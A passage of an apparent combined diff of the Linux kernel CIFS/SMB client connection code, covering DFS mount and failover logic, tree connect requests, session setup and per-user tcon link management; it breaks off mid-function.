++	    dfs_cache_find(mnt_ctx->xid, mnt_ctx->ses, cifs_sb->local_nls, cifs_remap(cifs_sb),
++			   ctx->UNC + 1, NULL, root_tl)) {
++		if (rc)
++			return rc;
++		/* Check if it is fully accessible and then mount it */
++		rc = is_path_remote(mnt_ctx);
++		if (!rc)
++			*isdfs = false;
++		else if (rc != -EREMOTE)
++			return rc;
++	}
++	return 0;
++}
++
++static int connect_dfs_target(struct mount_ctx *mnt_ctx, const char *full_path,
++			      const char *ref_path, struct dfs_cache_tgt_iterator *tit)
++{
++	int rc;
++	struct dfs_info3_param ref = {};
++	struct cifs_sb_info *cifs_sb = mnt_ctx->cifs_sb;
++	char *oldmnt = cifs_sb->ctx->mount_options;
++
++	cifs_dbg(FYI, "%s: full_path=%s ref_path=%s target=%s\n", __func__, full_path, ref_path,
++		 dfs_cache_get_tgt_name(tit));
++
++	rc = dfs_cache_get_tgt_referral(ref_path, tit, &ref);
++	if (rc)
++		goto out;
++
++	rc = expand_dfs_referral(mnt_ctx, full_path, &ref);
++	if (rc)
++		goto out;
++
++	/* Connect to new target only if we were redirected (e.g. mount options changed) */
++	if (oldmnt != cifs_sb->ctx->mount_options) {
++		mount_put_conns(mnt_ctx);
++		rc = mount_get_dfs_conns(mnt_ctx);
++	}
++	if (!rc) {
++		if (cifs_is_referral_server(mnt_ctx->tcon, &ref))
++			set_root_ses(mnt_ctx);
++		rc = dfs_cache_update_tgthint(mnt_ctx->xid, mnt_ctx->root_ses, cifs_sb->local_nls,
++					      cifs_remap(cifs_sb), ref_path, tit);
++	}
++
++out:
++	free_dfs_info_param(&ref);
++	return rc;
++}
++
++static int connect_dfs_root(struct mount_ctx *mnt_ctx, struct dfs_cache_tgt_list *root_tl)
++{
++	int rc;
++	char *full_path;
++	struct cifs_sb_info *cifs_sb = mnt_ctx->cifs_sb;
++	struct smb3_fs_context *ctx = mnt_ctx->fs_ctx;
++	struct dfs_cache_tgt_iterator *tit;
++
++	/* Put initial connections as they might be shared with other mounts.  We need unique dfs
++	 * connections per mount to properly failover, so mount_get_dfs_conns() must be used from
++	 * now on.
++	 */
++	mount_put_conns(mnt_ctx);
++	mount_get_dfs_conns(mnt_ctx);
++	set_root_ses(mnt_ctx);
++
++	full_path = build_unc_path_to_root(ctx, cifs_sb, true);
++	if (IS_ERR(full_path))
++		return PTR_ERR(full_path);
++
++	mnt_ctx->origin_fullpath = dfs_cache_canonical_path(ctx->UNC, cifs_sb->local_nls,
++							    cifs_remap(cifs_sb));
++	if (IS_ERR(mnt_ctx->origin_fullpath)) {
++		rc = PTR_ERR(mnt_ctx->origin_fullpath);
++		mnt_ctx->origin_fullpath = NULL;
++		goto out;
++	}
++
++	/* Try all dfs root targets */
++	for (rc = -ENOENT, tit = dfs_cache_get_tgt_iterator(root_tl);
++	     tit; tit = dfs_cache_get_next_tgt(root_tl, tit)) {
++		rc = connect_dfs_target(mnt_ctx, full_path, mnt_ctx->origin_fullpath + 1, tit);
++		if (!rc) {
++			mnt_ctx->leaf_fullpath = kstrdup(mnt_ctx->origin_fullpath, GFP_KERNEL);
++			if (!mnt_ctx->leaf_fullpath)
++				rc = -ENOMEM;
++			break;
++		}
++	}
++
++out:
++	kfree(full_path);
++	return rc;
++}
++
++static int __follow_dfs_link(struct mount_ctx *mnt_ctx)
++{
++	int rc;
++	struct cifs_sb_info *cifs_sb = mnt_ctx->cifs_sb;
++	struct smb3_fs_context *ctx = mnt_ctx->fs_ctx;
++	char *full_path;
++	struct dfs_cache_tgt_list tl = DFS_CACHE_TGT_LIST_INIT(tl);
++	struct dfs_cache_tgt_iterator *tit;
++
++	full_path = build_unc_path_to_root(ctx, cifs_sb, true);
++	if (IS_ERR(full_path))
++		return PTR_ERR(full_path);
++
++	kfree(mnt_ctx->leaf_fullpath);
++	mnt_ctx->leaf_fullpath = dfs_cache_canonical_path(full_path, cifs_sb->local_nls,
++							  cifs_remap(cifs_sb));
++	if (IS_ERR(mnt_ctx->leaf_fullpath)) {
++		rc = PTR_ERR(mnt_ctx->leaf_fullpath);
++		mnt_ctx->leaf_fullpath = NULL;
++		goto out;
++	}
++
++	/* Get referral from dfs link */
++	rc = dfs_cache_find(mnt_ctx->xid, mnt_ctx->root_ses, cifs_sb->local_nls,
++			    cifs_remap(cifs_sb), mnt_ctx->leaf_fullpath + 1, NULL, &tl);
++	if (rc)
++		goto out;
++
++	/* Try all dfs link targets.  If an I/O fails from currently connected DFS target with an
++	 * error other than STATUS_PATH_NOT_COVERED (-EREMOTE), then retry it from other targets as
++	 * specified in MS-DFSC "3.1.5.2 I/O Operation to Target Fails with an Error Other Than
++	 * STATUS_PATH_NOT_COVERED."
++	 */
++	for (rc = -ENOENT, tit = dfs_cache_get_tgt_iterator(&tl);
++	     tit; tit = dfs_cache_get_next_tgt(&tl, tit)) {
++		rc = connect_dfs_target(mnt_ctx, full_path, mnt_ctx->leaf_fullpath + 1, tit);
++		if (!rc) {
++			rc = is_path_remote(mnt_ctx);
++			if (!rc || rc == -EREMOTE)
++				break;
++		}
++	}
++
++out:
++	kfree(full_path);
++	dfs_cache_free_tgts(&tl);
++	return rc;
++}
++
++static int follow_dfs_link(struct mount_ctx *mnt_ctx)
++{
++	int rc;
++	struct cifs_sb_info *cifs_sb = mnt_ctx->cifs_sb;
++	struct smb3_fs_context *ctx = mnt_ctx->fs_ctx;
++	char *full_path;
++	int num_links = 0;
++
++	full_path = build_unc_path_to_root(ctx, cifs_sb, true);
++	if (IS_ERR(full_path))
++		return PTR_ERR(full_path);
++
++	kfree(mnt_ctx->origin_fullpath);
++	mnt_ctx->origin_fullpath = dfs_cache_canonical_path(full_path, cifs_sb->local_nls,
++							    cifs_remap(cifs_sb));
++	kfree(full_path);
++
++	if (IS_ERR(mnt_ctx->origin_fullpath)) {
++		rc = PTR_ERR(mnt_ctx->origin_fullpath);
++		mnt_ctx->origin_fullpath = NULL;
++		return rc;
++	}
++
++	do {
++		rc = __follow_dfs_link(mnt_ctx);
++		if (!rc || rc != -EREMOTE)
++			break;
++	} while (rc = -ELOOP, ++num_links < MAX_NESTED_LINKS);
++
++	return rc;
++}
++
++/* Set up DFS referral paths for failover */
++static void setup_server_referral_paths(struct mount_ctx *mnt_ctx)
++{
++	struct TCP_Server_Info *server = mnt_ctx->server;
++
++	mutex_lock(&server->refpath_lock);
++	server->origin_fullpath = mnt_ctx->origin_fullpath;
++	server->leaf_fullpath = mnt_ctx->leaf_fullpath;
++	server->current_fullpath = mnt_ctx->leaf_fullpath;
++	mutex_unlock(&server->refpath_lock);
++	mnt_ctx->origin_fullpath = mnt_ctx->leaf_fullpath = NULL;
++}
++
++int cifs_mount(struct cifs_sb_info *cifs_sb, struct smb3_fs_context *ctx)
++{
++	int rc;
++	struct mount_ctx mnt_ctx = { .cifs_sb = cifs_sb, .fs_ctx = ctx, };
++	struct dfs_cache_tgt_list tl = DFS_CACHE_TGT_LIST_INIT(tl);
++	bool isdfs;
++
++	rc = is_dfs_mount(&mnt_ctx, &isdfs, &tl);
++	if (rc)
++		goto error;
++	if (!isdfs)
++		goto out;
++
++	/* proceed as DFS mount */
++	uuid_gen(&mnt_ctx.mount_id);
++	rc = connect_dfs_root(&mnt_ctx, &tl);
++	dfs_cache_free_tgts(&tl);
++
++	if (rc)
++		goto error;
++
++	rc = is_path_remote(&mnt_ctx);
++	if (rc)
++		rc = follow_dfs_link(&mnt_ctx);
++	if (rc)
++		goto error;
++
++	setup_server_referral_paths(&mnt_ctx);
++	/*
++	 * After reconnecting to a different server, unique ids won't match anymore, so we disable
++	 * serverino. This prevents dentry revalidation to think the dentry are stale (ESTALE).
++	 */
++	cifs_autodisable_serverino(cifs_sb);
++	/*
++	 * Force the use of prefix path to support failover on DFS paths that resolve to targets
++	 * that have different prefix paths.
++	 */
++	cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_USE_PREFIX_PATH;
++	kfree(cifs_sb->prepath);
++	cifs_sb->prepath = ctx->prepath;
++	ctx->prepath = NULL;
++	uuid_copy(&cifs_sb->dfs_mount_id, &mnt_ctx.mount_id);
++
++out:
++	cifs_try_adding_channels(cifs_sb, mnt_ctx.ses);
++	rc = mount_setup_tlink(cifs_sb, mnt_ctx.ses, mnt_ctx.tcon);
++	if (rc)
++		goto error;
++
++	free_xid(mnt_ctx.xid);
++	return rc;
++
++error:
++	dfs_cache_put_refsrv_sessions(&mnt_ctx.mount_id);
++	kfree(mnt_ctx.origin_fullpath);
++	kfree(mnt_ctx.leaf_fullpath);
++	mount_put_conns(&mnt_ctx);
++	return rc;
++}
++#else
++int cifs_mount(struct cifs_sb_info *cifs_sb, struct smb3_fs_context *ctx)
++{
++	int rc = 0;
++	struct mount_ctx mnt_ctx = { .cifs_sb = cifs_sb, .fs_ctx = ctx, };
++
++	rc = mount_get_conns(&mnt_ctx);
++	if (rc)
++		goto error;
++
++	if (mnt_ctx.tcon) {
++		rc = is_path_remote(&mnt_ctx);
++		if (rc == -EREMOTE)
++			rc = -EOPNOTSUPP;
++		if (rc)
++			goto error;
++	}
++
++	rc = mount_setup_tlink(cifs_sb, mnt_ctx.ses, mnt_ctx.tcon);
++	if (rc)
++		goto error;
++
++	free_xid(mnt_ctx.xid);
++	return rc;
++
++error:
++	mount_put_conns(&mnt_ctx);
++	return rc;
++}
++#endif
++
++/*
++ * Issue a TREE_CONNECT request.
++ */
++int
++CIFSTCon(const unsigned int xid, struct cifs_ses *ses,
++	 const char *tree, struct cifs_tcon *tcon,
++	 const struct nls_table *nls_codepage)
++{
++	struct smb_hdr *smb_buffer;
++	struct smb_hdr *smb_buffer_response;
++	TCONX_REQ *pSMB;
++	TCONX_RSP *pSMBr;
++	unsigned char *bcc_ptr;
++	int rc = 0;
++	int length;
++	__u16 bytes_left, count;
++
++	if (ses == NULL)
++		return -EIO;
++
++	smb_buffer = cifs_buf_get();
++	if (smb_buffer == NULL)
++		return -ENOMEM;
++
++	smb_buffer_response = smb_buffer;
++
++	header_assemble(smb_buffer, SMB_COM_TREE_CONNECT_ANDX,
++			NULL /*no tid */ , 4 /*wct */ );
++
++	smb_buffer->Mid = get_next_mid(ses->server);
++	smb_buffer->Uid = ses->Suid;
++	pSMB = (TCONX_REQ *) smb_buffer;
++	pSMBr = (TCONX_RSP *) smb_buffer_response;
++
++	pSMB->AndXCommand = 0xFF;
++	pSMB->Flags = cpu_to_le16(TCON_EXTENDED_SECINFO);
++	bcc_ptr = &pSMB->Password[0];
++
++	pSMB->PasswordLength = cpu_to_le16(1);	/* minimum */
++	*bcc_ptr = 0; /* password is null byte */
++	bcc_ptr++;              /* skip password */
++	/* already aligned so no need to do it below */
++
++	if (ses->server->sign)
++		smb_buffer->Flags2 |= SMBFLG2_SECURITY_SIGNATURE;
++
++	if (ses->capabilities & CAP_STATUS32) {
++		smb_buffer->Flags2 |= SMBFLG2_ERR_STATUS;
++	}
++	if (ses->capabilities & CAP_DFS) {
++		smb_buffer->Flags2 |= SMBFLG2_DFS;
++	}
++	if (ses->capabilities & CAP_UNICODE) {
++		smb_buffer->Flags2 |= SMBFLG2_UNICODE;
++		length =
++		    cifs_strtoUTF16((__le16 *) bcc_ptr, tree,
++			6 /* max utf8 char length in bytes */ *
++			(/* server len*/ + 256 /* share len */), nls_codepage);
++		bcc_ptr += 2 * length;	/* convert num 16 bit words to bytes */
++		bcc_ptr += 2;	/* skip trailing null */
++	} else {		/* ASCII */
++		strcpy(bcc_ptr, tree);
++		bcc_ptr += strlen(tree) + 1;
++	}
++	strcpy(bcc_ptr, "?????");
++	bcc_ptr += strlen("?????");
++	bcc_ptr += 1;
++	count = bcc_ptr - &pSMB->Password[0];
++	be32_add_cpu(&pSMB->hdr.smb_buf_length, count);
++	pSMB->ByteCount = cpu_to_le16(count);
++
++	rc = SendReceive(xid, ses, smb_buffer, smb_buffer_response, &length,
++			 0);
++
++	/* above now done in SendReceive */
++	if (rc == 0) {
++		bool is_unicode;
++
++		tcon->tid = smb_buffer_response->Tid;
++		bcc_ptr = pByteArea(smb_buffer_response);
++		bytes_left = get_bcc(smb_buffer_response);
++		length = strnlen(bcc_ptr, bytes_left - 2);
++		if (smb_buffer->Flags2 & SMBFLG2_UNICODE)
++			is_unicode = true;
++		else
++			is_unicode = false;
++
++
++		/* skip service field (NB: this field is always ASCII) */
++		if (length == 3) {
++			if ((bcc_ptr[0] == 'I') && (bcc_ptr[1] == 'P') &&
++			    (bcc_ptr[2] == 'C')) {
++				cifs_dbg(FYI, "IPC connection\n");
++				tcon->ipc = true;
++				tcon->pipe = true;
++			}
++		} else if (length == 2) {
++			if ((bcc_ptr[0] == 'A') && (bcc_ptr[1] == ':')) {
++				/* the most common case */
++				cifs_dbg(FYI, "disk share connection\n");
++			}
++		}
++		bcc_ptr += length + 1;
++		bytes_left -= (length + 1);
++		strscpy(tcon->tree_name, tree, sizeof(tcon->tree_name));
++
++		/* mostly informational -- no need to fail on error here */
++		kfree(tcon->nativeFileSystem);
++		tcon->nativeFileSystem = cifs_strndup_from_utf16(bcc_ptr,
++						      bytes_left, is_unicode,
++						      nls_codepage);
++
++		cifs_dbg(FYI, "nativeFileSystem=%s\n", tcon->nativeFileSystem);
++
++		if ((smb_buffer_response->WordCount == 3) ||
++			 (smb_buffer_response->WordCount == 7))
++			/* field is in same location */
++			tcon->Flags = le16_to_cpu(pSMBr->OptionalSupport);
++		else
++			tcon->Flags = 0;
++		cifs_dbg(FYI, "Tcon flags: 0x%x\n", tcon->Flags);
++	}
++
++	cifs_buf_release(smb_buffer);
++	return rc;
++}
++
++static void delayed_free(struct rcu_head *p)
++{
++	struct cifs_sb_info *cifs_sb = container_of(p, struct cifs_sb_info, rcu);
++
++	unload_nls(cifs_sb->local_nls);
++	smb3_cleanup_fs_context(cifs_sb->ctx);
++	kfree(cifs_sb);
++}
++
++void
++cifs_umount(struct cifs_sb_info *cifs_sb)
++{
++	struct rb_root *root = &cifs_sb->tlink_tree;
++	struct rb_node *node;
++	struct tcon_link *tlink;
++
++	cancel_delayed_work_sync(&cifs_sb->prune_tlinks);
++
++	spin_lock(&cifs_sb->tlink_tree_lock);
++	while ((node = rb_first(root))) {
++		tlink = rb_entry(node, struct tcon_link, tl_rbnode);
++		cifs_get_tlink(tlink);
++		clear_bit(TCON_LINK_IN_TREE, &tlink->tl_flags);
++		rb_erase(node, root);
++
++		spin_unlock(&cifs_sb->tlink_tree_lock);
++		cifs_put_tlink(tlink);
++		spin_lock(&cifs_sb->tlink_tree_lock);
++	}
++	spin_unlock(&cifs_sb->tlink_tree_lock);
++
++	kfree(cifs_sb->prepath);
++#ifdef CONFIG_CIFS_DFS_UPCALL
++	dfs_cache_put_refsrv_sessions(&cifs_sb->dfs_mount_id);
++#endif
++	call_rcu(&cifs_sb->rcu, delayed_free);
++}
++
++int
++cifs_negotiate_protocol(const unsigned int xid, struct cifs_ses *ses,
++			struct TCP_Server_Info *server)
++{
++	int rc = 0;
++
++	if (!server->ops->need_neg || !server->ops->negotiate)
++		return -ENOSYS;
++
++	/* only send once per connect */
++	spin_lock(&server->srv_lock);
++	if (server->tcpStatus != CifsGood &&
++	    server->tcpStatus != CifsNew &&
++	    server->tcpStatus != CifsNeedNegotiate) {
++		spin_unlock(&server->srv_lock);
++		return -EHOSTDOWN;
++	}
++
++	if (!server->ops->need_neg(server) &&
++	    server->tcpStatus == CifsGood) {
++		spin_unlock(&server->srv_lock);
++		return 0;
++	}
++
++	server->tcpStatus = CifsInNegotiate;
++	spin_unlock(&server->srv_lock);
++
++	rc = server->ops->negotiate(xid, ses, server);
++	if (rc == 0) {
++		spin_lock(&server->srv_lock);
++		if (server->tcpStatus == CifsInNegotiate)
++			server->tcpStatus = CifsGood;
++		else
++			rc = -EHOSTDOWN;
++		spin_unlock(&server->srv_lock);
++	} else {
++		spin_lock(&server->srv_lock);
++		if (server->tcpStatus == CifsInNegotiate)
++			server->tcpStatus = CifsNeedNegotiate;
++		spin_unlock(&server->srv_lock);
++	}
++
++	return rc;
++}
++
++int
++cifs_setup_session(const unsigned int xid, struct cifs_ses *ses,
++		   struct TCP_Server_Info *server,
++		   struct nls_table *nls_info)
++{
++	int rc = -ENOSYS;
++	struct TCP_Server_Info *pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
++	struct sockaddr_in6 *addr6 = (struct sockaddr_in6 *)&pserver->dstaddr;
++	struct sockaddr_in *addr = (struct sockaddr_in *)&pserver->dstaddr;
++	bool is_binding = false;
++
++	spin_lock(&ses->ses_lock);
++	cifs_dbg(FYI, "%s: channel connect bitmap: 0x%lx\n",
++		 __func__, ses->chans_need_reconnect);
++
++	if (ses->ses_status != SES_GOOD &&
++	    ses->ses_status != SES_NEW &&
++	    ses->ses_status != SES_NEED_RECON) {
++		spin_unlock(&ses->ses_lock);
++		return -EHOSTDOWN;
++	}
++
++	/* only send once per connect */
++	spin_lock(&ses->chan_lock);
++	if (CIFS_ALL_CHANS_GOOD(ses)) {
++		if (ses->ses_status == SES_NEED_RECON)
++			ses->ses_status = SES_GOOD;
++		spin_unlock(&ses->chan_lock);
++		spin_unlock(&ses->ses_lock);
++		return 0;
++	}
++
++	cifs_chan_set_in_reconnect(ses, server);
++	is_binding = !CIFS_ALL_CHANS_NEED_RECONNECT(ses);
++	spin_unlock(&ses->chan_lock);
++
++	if (!is_binding)
++		ses->ses_status = SES_IN_SETUP;
++	spin_unlock(&ses->ses_lock);
++
++	/* update ses ip_addr only for primary chan */
++	if (server == pserver) {
++		if (server->dstaddr.ss_family == AF_INET6)
++			scnprintf(ses->ip_addr, sizeof(ses->ip_addr), "%pI6", &addr6->sin6_addr);
++		else
++			scnprintf(ses->ip_addr, sizeof(ses->ip_addr), "%pI4", &addr->sin_addr);
++	}
++
++	if (!is_binding) {
++		ses->capabilities = server->capabilities;
++		if (!linuxExtEnabled)
++			ses->capabilities &= (~server->vals->cap_unix);
++
++		if (ses->auth_key.response) {
++			cifs_dbg(FYI, "Free previous auth_key.response = %p\n",
++				 ses->auth_key.response);
++			kfree_sensitive(ses->auth_key.response);
++			ses->auth_key.response = NULL;
++			ses->auth_key.len = 0;
++		}
++	}
++
++	cifs_dbg(FYI, "Security Mode: 0x%x Capabilities: 0x%x TimeAdjust: %d\n",
++		 server->sec_mode, server->capabilities, server->timeAdj);
++
++	if (server->ops->sess_setup)
++		rc = server->ops->sess_setup(xid, ses, server, nls_info);
++
++	if (rc) {
++		cifs_server_dbg(VFS, "Send error in SessSetup = %d\n", rc);
++		spin_lock(&ses->ses_lock);
++		if (ses->ses_status == SES_IN_SETUP)
++			ses->ses_status = SES_NEED_RECON;
++		spin_lock(&ses->chan_lock);
++		cifs_chan_clear_in_reconnect(ses, server);
++		spin_unlock(&ses->chan_lock);
++		spin_unlock(&ses->ses_lock);
++	} else {
++		spin_lock(&ses->ses_lock);
++		if (ses->ses_status == SES_IN_SETUP)
++			ses->ses_status = SES_GOOD;
++		spin_lock(&ses->chan_lock);
++		cifs_chan_clear_in_reconnect(ses, server);
++		cifs_chan_clear_need_reconnect(ses, server);
++		spin_unlock(&ses->chan_lock);
++		spin_unlock(&ses->ses_lock);
++	}
++
++	return rc;
++}
++
++static int
++cifs_set_vol_auth(struct smb3_fs_context *ctx, struct cifs_ses *ses)
++{
++	ctx->sectype = ses->sectype;
++
++	/* krb5 is special, since we don't need username or pw */
++	if (ctx->sectype == Kerberos)
++		return 0;
++
++	return cifs_set_cifscreds(ctx, ses);
++}
++
++static struct cifs_tcon *
++cifs_construct_tcon(struct cifs_sb_info *cifs_sb, kuid_t fsuid)
++{
++	int rc;
++	struct cifs_tcon *master_tcon = cifs_sb_master_tcon(cifs_sb);
++	struct cifs_ses *ses;
++	struct cifs_tcon *tcon = NULL;
++	struct smb3_fs_context *ctx;
++
++	ctx = kzalloc(sizeof(*ctx), GFP_KERNEL);
++	if (ctx == NULL)
++		return ERR_PTR(-ENOMEM);
++
++	ctx->local_nls = cifs_sb->local_nls;
++	ctx->linux_uid = fsuid;
++	ctx->cred_uid = fsuid;
++	ctx->UNC = master_tcon->tree_name;
++	ctx->retry = master_tcon->retry;
++	ctx->nocase = master_tcon->nocase;
++	ctx->nohandlecache = master_tcon->nohandlecache;
++	ctx->local_lease = master_tcon->local_lease;
++	ctx->no_lease = master_tcon->no_lease;
++	ctx->resilient = master_tcon->use_resilient;
++	ctx->persistent = master_tcon->use_persistent;
++	ctx->handle_timeout = master_tcon->handle_timeout;
++	ctx->no_linux_ext = !master_tcon->unix_ext;
++	ctx->linux_ext = master_tcon->posix_extensions;
++	ctx->sectype = master_tcon->ses->sectype;
++	ctx->sign = master_tcon->ses->sign;
++	ctx->seal = master_tcon->seal;
++	ctx->witness = master_tcon->use_witness;
++
++	rc = cifs_set_vol_auth(ctx, master_tcon->ses);
++	if (rc) {
++		tcon = ERR_PTR(rc);
++		goto out;
++	}
++
++	/* get a reference for the same TCP session */
++	spin_lock(&cifs_tcp_ses_lock);
++	++master_tcon->ses->server->srv_count;
++	spin_unlock(&cifs_tcp_ses_lock);
++
++	ses = cifs_get_smb_ses(master_tcon->ses->server, ctx);
++	if (IS_ERR(ses)) {
++		tcon = (struct cifs_tcon *)ses;
++		cifs_put_tcp_session(master_tcon->ses->server, 0);
++		goto out;
++	}
++
++	tcon = cifs_get_tcon(ses, ctx);
++	if (IS_ERR(tcon)) {
++		cifs_put_smb_ses(ses);
++		goto out;
++	}
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	if (cap_unix(ses))
++		reset_cifs_unix_caps(0, tcon, NULL, ctx);
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++out:
++	kfree(ctx->username);
++	kfree_sensitive(ctx->password);
++	kfree(ctx);
++
++	return tcon;
++}
++
++struct cifs_tcon *
++cifs_sb_master_tcon(struct cifs_sb_info *cifs_sb)
++{
++	return tlink_tcon(cifs_sb_master_tlink(cifs_sb));
++}
++
++/* find and return a tlink with given uid */
++static struct tcon_link *
++tlink_rb_search(struct rb_root *root, kuid_t uid)
++{
++	struct rb_node *node = root->rb_node;
++	struct tcon_link *tlink;
++
++	while (node) {
++		tlink = rb_entry(node, struct tcon_link, tl_rbnode);
++
++		if (uid_gt(tlink->tl_uid, uid))
++			node = node->rb_left;
++		else if (uid_lt(tlink->tl_uid, uid))
++			node = node->rb_right;
++		else
++			return tlink;
++	}
++	return NULL;
++}
++
++/* insert a tcon_link into the tree */
++static void
++tlink_rb_insert(struct rb_root *root, struct tcon_link *new_tlink)
++{
++	struct rb_node **new = &(root->rb_node), *parent = NULL;
++	struct tcon_link *tlink;
++
++	while (*new) {
++		tlink = rb_entry(*new, struct tcon_link, tl_rbnode);
++		parent = *new;
++
++		if (uid_gt(tlink->tl_uid, new_tlink->tl_uid))
++			new = &((*new)->rb_left);
++		else
++			new = &((*new)->rb_right);
++	}
++
++	rb_link_node(&new_tlink->tl_rbnode, parent, new);
++	rb_insert_color(&new_tlink->tl_rbnode, root);
++}
++
++/*
++ * Find or construct an appropriate tcon given a cifs_sb and the fsuid of the
++ * current task.
++ *
++ * If the superblock doesn't refer to a multiuser mount, then just return
++ * the master tcon for the mount.
++ *
++ * First, search the rbtree for an existing tcon for this fsuid. If one
++ * exists, then check to see if it's pending construction. If it is then wait
++ * for construction to complete. Once it's no longer pending, check to see if
++ * it failed and either return an error or retry construction, depending on
++ * the timeout.
++ *
++ * If one doesn't exist then insert a new tcon_link struct into the tree and
++ * try to construct a new one.
++ */
++struct tcon_link *
++cifs_sb_tlink(struct cifs_sb_info *cifs_sb)
++{
++	int ret;
++	kuid_t fsuid = current_fsuid();
++	struct tcon_link *tlink, *newtlink;
++
++	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MULTIUSER))
++		return cifs_get_tlink(cifs_sb_master_tlink(cifs_sb));
++
++	spin_lock(&cifs_sb->tlink_tree_lock);
++	tlink = tlink_rb_search(&cifs_sb->tlink_tree, fsuid);
++	if (tlink)
++		cifs_get_tlink(tlink);
++	spin_unlock(&cifs_sb->tlink_tree_lock);
++
++	if (tlink == NULL) {
++		newtlink = kzalloc(sizeof(*tlink), GFP_KERNEL);
++		if (newtlink == NULL)
++			return ERR_PTR(-ENOMEM);
++		newtlink->tl_uid = fsuid;
++		newtlink->tl_tcon = ERR_PTR(-EACCES);
++		set_bit(TCON_LINK_PENDING, &newtlink->tl_flags);
++		set_bit(TCON_LINK_IN_TREE, &newtlink->tl_flags);
++		cifs_get_tlink(newtlink);
++
++		spin_lock(&cifs_sb->tlink_tree_lock);
++		/* was one inserted after previous search? */
++		tlink = tlink_rb_search(&cifs_sb->tlink_tree, fsuid);
++		if (tlink) {
++			cifs_get_tlink(tlink);
++			spin_unlock(&cifs_sb->tlink_tree_lock);
++			kfree(newtlink);
++			goto wait_for_construction;
++		}
++		tlink = newtlink;
++		tlink_rb_insert(&cifs_sb->tlink_tree, tlink);
++		spin_unlock(&cifs_sb->tlink_tree_lock);
++	} else {
++wait_for_construction:
++		ret = wait_on_bit(&tlink->tl_flags, TCON_LINK_PENDING,
++				  TASK_INTERRUPTIBLE);
++		if (ret) {
++			cifs_put_tlink(tlink);
++			return ERR_PTR(-ERESTARTSYS);
++		}
++
++		/* if it's good, return it */
++		if (!IS_ERR(tlink->tl_tcon))
++			return tlink;
++
++		/* return error if we tried this already recently */
++		if (time_before(jiffies, tlink->tl_time + TLINK_ERROR_EXPIRE)) {
++			cifs_put_tlink(tlink);
++			return ERR_PTR(-EACCES);
++		}
++
++		if (test_and_set_bit(TCON_LINK_PENDING, &tlink->tl_flags))
++			goto wait_for_construction;
++	}
++
++	tlink->tl_tcon = cifs_construct_tcon(cifs_sb, fsuid);
++	clear_bit(TCON_LINK_PENDING, &tlink->tl_flags);
++	wake_up_bit(&tlink->tl_flags, TCON_LINK_PENDING);
++
++	if (IS_ERR(tlink->tl_tcon)) {
++		cifs_put_tlink(tlink);
++		return ERR_PTR(-EACCES);
++	}
++
++	return tlink;
++}
++
++/*
++ * periodic workqueue job that scans tcon_tree for a superblock and closes
++ * out tcons.
++ */
++static void
++cifs_prune_tlinks(struct work_struct *work)
++{
++	struct cifs_sb_info *cifs_sb = container_of(work, struct cifs_sb_info,
++						    prune_tlinks.work);
++	struct rb_root *root = &cifs_sb->tlink_tree;
++	struct rb_node *node;
++	struct rb_node *tmp;
++	struct tcon_link *tlink;
++
++	/*
++	 * Because we drop the spinlock in the loop in order to put the tlink
++	 * it's not guarded against removal of links from the tree. The only
++	 * places that remove entries from the tree are this function and
++	 * umounts. Because this function is non-reentrant and is canceled
++	 * before umount can proceed, this is safe.
++	 */
++	spin_lock(&cifs_sb->tlink_tree_lock);
++	node = rb_first(root);
++	while (node != NULL) {
++		tmp = node;
++		node = rb_next(tmp);
++		tlink = rb_entry(tmp, struct tcon_link, tl_rbnode);
++
++		if (test_bit(TCON_LINK_MASTER, &tlink->tl_flags) ||
++		    atomic_read(&tlink->tl_count) != 0 ||
++		    time_after(tlink->tl_time + TLINK_IDLE_EXPIRE, jiffies))
++			continue;
++
++		cifs_get_tlink(tlink);
++		clear_bit(TCON_LINK_IN_TREE, &tlink->tl_flags);
++		rb_erase(tmp, root);
++
++		spin_unlock(&cifs_sb->tlink_tree_lock);
++		cifs_put_tlink(tlink);
++		spin_lock(&cifs_sb->tlink_tree_lock);
++	}
++	spin_unlock(&cifs_sb->tlink_tree_lock);
++
++	queue_delayed_work(cifsiod_wq, &cifs_sb->prune_tlinks,
++				TLINK_IDLE_EXPIRE);
++}
++
++#ifdef CONFIG_CIFS_DFS_UPCALL
++/* Update dfs referral path of superblock */
++static int update_server_fullpath(struct TCP_Server_Info *server, struct cifs_sb_info *cifs_sb,
++				  const char *target)
++{
++	int rc = 0;
++	size_t len = strlen(target);
++	char *refpath, *npath;
++
++	if (unlikely(len < 2 || *target != '\\'))
++		return -EINVAL;
++
++	if (target[1] == '\\') {
++		len += 1;
++		refpath = kmalloc(len, GFP_KERNEL);
++		if (!refpath)
++			return -ENOMEM;
++
++		scnprintf(refpath, len, "%s", target);
++	} else {
++		len += sizeof("\\");
++		refpath = kmalloc(len, GFP_KERNEL);
++		if (!refpath)
++			return -ENOMEM;
++
++		scnprintf(refpath, len, "\\%s", target);
++	}
++
++	npath = dfs_cache_canonical_path(refpath, cifs_sb->local_nls, cifs_remap(cifs_sb));
++	kfree(refpath);
++
++	if (IS_ERR(npath)) {
++		rc = PTR_ERR(npath);
++	} else {
++		mutex_lock(&server->refpath_lock);
++		kfree(server->leaf_fullpath);
++		server->leaf_fullpath = npath;
++		mutex_unlock(&server->refpath_lock);
++		server->current_fullpath = server->leaf_fullpath;
++	}
++	return rc;
++}
++
++static int target_share_matches_server(struct TCP_Server_Info *server, const char *tcp_host,
++				       size_t tcp_host_len, char *share, bool *target_match)
++{
++	int rc = 0;
++	const char *dfs_host;
++	size_t dfs_host_len;
++
++	*target_match = true;
++	extract_unc_hostname(share, &dfs_host, &dfs_host_len);
++
++	/* Check if hostnames or addresses match */
++	if (dfs_host_len != tcp_host_len || strncasecmp(dfs_host, tcp_host, dfs_host_len) != 0) {
++		cifs_dbg(FYI, "%s: %.*s doesn't match %.*s\n", __func__, (int)dfs_host_len,
++			 dfs_host, (int)tcp_host_len, tcp_host);
++		rc = match_target_ip(server, dfs_host, dfs_host_len, target_match);
++		if (rc)
++			cifs_dbg(VFS, "%s: failed to match target ip: %d\n", __func__, rc);
++	}
++	return rc;
++}
++
++static int __tree_connect_dfs_target(const unsigned int xid, struct cifs_tcon *tcon,
++				     struct cifs_sb_info *cifs_sb, char *tree, bool islink,
++				     struct dfs_cache_tgt_list *tl)
++{
++	int rc;
++	struct TCP_Server_Info *server = tcon->ses->server;
